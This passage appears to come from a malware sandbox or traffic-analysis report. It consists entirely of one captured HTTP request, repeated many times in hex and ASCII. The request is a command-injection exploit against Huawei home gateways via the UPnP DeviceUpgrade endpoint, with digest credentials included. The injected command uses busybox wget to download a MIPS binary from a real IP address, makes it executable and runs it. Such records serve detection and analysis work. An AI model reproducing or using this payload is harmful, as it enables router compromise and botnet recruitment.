3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
